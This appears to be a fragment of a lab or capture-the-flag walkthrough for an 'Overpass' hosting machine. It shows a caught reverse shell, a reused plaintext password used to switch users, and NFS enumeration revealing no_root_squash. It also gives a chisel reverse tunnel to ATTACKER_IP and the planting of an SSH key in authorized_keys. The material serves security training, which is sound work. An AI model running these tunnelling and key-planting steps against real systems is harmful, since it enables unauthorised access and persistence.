Overpass HOSTING
Tunneling
- We can catch the Reverse Shell Using
netcat
apache@ip-10-10-109-248 /$ id
uid=48(apache) gid=48(apache) groups=48(apache)
- We can switch to the User Paradox using the same Password as for
FTP: paradox:ShibesAreGreat123
[paradox@ip-10-10-109-248 ~]$ id
uid=1001(paradox) gid=1001(paradox) groups=1001(paradox)
- The
NFSService is running Locally [NFS is usingno_root_squash]. We can useSSH Tunnelingor chisel to access the Service on our Machine. - If
no_root_squashis used, Remote ROOT Users are able to change any file on the Shared File System.
[paradox@ip-10-10-109-248 ~]$ rpcinfo -p
program vers proto port service
100000 4 tcp 111 portmapper
100000 3 tcp 111 portmapper
100000 2 tcp 111 portmapper
100000 4 udp 111 portmapper
100000 3 udp 111 portmapper
100000 2 udp 111 portmapper
100005 1 udp 20048 mountd
100005 1 tcp 20048 mountd
100024 1 udp 49437 status
100024 1 tcp 44301 status
100005 2 udp 20048 mountd
100005 2 tcp 20048 mountd
100005 3 udp 20048 mountd
100005 3 tcp 20048 mountd
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100227 3 tcp 2049 nfs_acl
100021 1 udp 56458 nlockmgr
100021 3 udp 56458 nlockmgr
100021 4 udp 56458 nlockmgr
100021 1 tcp 45237 nlockmgr
100021 3 tcp 45237 nlockmgr
100021 4 tcp 45237 nlockmgr
[paradox@ip-10-10-109-248 ~]$ cat /etc/exports
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
Chisel
- Transfer the chisel Binary on the Victim Machine.
- Server
- Target
chisel server --reverse --port 8000
chisel client ATTACKER_IP:8000 R:2049:127.0.0.1:2049
OTHER [SSH]
To use SSH Tunneling on this Machine we have to add our Public SSH Key into authorized_keys of the Target Machine.
echo "id_rsa.pub" >> /home/paradox/.ssh/authorized_keys
## SSH Tunneling
ssh -L 2049:localhost:2049 paradox@VICTIM_IP